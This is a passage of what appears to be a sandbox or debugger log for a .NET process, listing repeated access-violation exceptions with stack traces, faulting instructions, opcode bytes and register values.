CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335768
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335776
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 46289140
1 0 0

__exception__

 stacktrace: 
0x843db34
0x843d9e8
0x8438b8d
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335532
registers.edi: 3335780
registers.eax: 0
registers.ebp: 3335792
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843de0a
0x843d9e8
0x8438b8d
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335768
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335776
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 47783796
1 0 0

__exception__

 stacktrace: 
0x843e17d
0x843e058
0x8438b75
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335552
registers.edi: 3335800
registers.eax: 0
registers.ebp: 3335812
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843e432
0x843e058
0x8438b75
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335788
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335796
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 44574020
1 0 0

__exception__

 stacktrace: 
0x843e17d
0x843e058
0x8438b8d
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335552
registers.edi: 3335800
registers.eax: 0
registers.ebp: 3335812
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843e432
0x843e058
0x8438b8d
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335788
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335796
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 46071056
1 0 0

__exception__

 stacktrace: 
0x843e17d
0x843e058
0x8438b8d
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335552
registers.edi: 3335800
registers.eax: 0
registers.ebp: 3335812
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843e432
0x843e058
0x8438b8d
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335788
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335796
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 47568092
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843f407
0x843ebd9
0x843656c
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3336672
registers.edi: 3336952
registers.eax: 0
registers.ebp: 3336680
registers.edx: 0
registers.ebx: 3338428
registers.esi: 48107932
registers.ecx: 48115016
1 0 0

__exception__

 stacktrace: 
0x7ac13d
0x7abf0e
0x7a6cad
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7ac278
registers.esp: 3009428
registers.edi: 3009480
registers.eax: 0
registers.ebp: 3009492
registers.edx: 5134288
registers.ebx: 3010700
registers.esi: 44390424
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x7af326
0x7af1e9
0x7af105
0x7ad80b
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007780
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x7af738
0x7af1e9
0x7af105
0x7ad80b
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008016
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 45959968
1 0 0

__exception__

 stacktrace: 
0x7af326
0x7af1e9
0x7af11d
0x7ad80b
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007780
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x7af738
0x7af1e9
0x7af11d
0x7ad80b
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008016
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 47391840
1 0 0

__exception__

 stacktrace: 
0x7af326
0x7af1e9
0x7af11d
0x7ad80b
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
